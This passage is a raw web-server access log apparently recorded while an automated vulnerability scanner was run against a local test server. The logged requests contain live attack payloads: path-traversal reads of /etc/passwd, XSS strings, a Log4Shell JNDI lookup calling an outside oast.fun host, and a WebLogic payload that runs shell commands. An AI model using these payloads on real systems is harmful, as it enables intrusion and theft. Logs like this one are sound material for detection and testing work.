\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/SOAPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.idea/httpRequests/http-client.cookies HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-ajax-chat/sac-export.csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/logoff.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.ca285tosmpvbafqg07h05n346twmwhahf.oast.fun}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_dump.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1/user_add.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://ca285tosmpvbafqg07h03uxkuut4k91da.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php/'%3E%3Csvg/onload=alert%6029KAXxl9m3QtfxHvJOTfam9rPZX%60%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/help/support HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/iwp-client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%3B/monitoring HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"{\x22@type\x22:\x22java.lang.AutoCloseable\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/app HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"bsh.script=exec(\x22id\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/bps-backup/logs/db_backup_log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 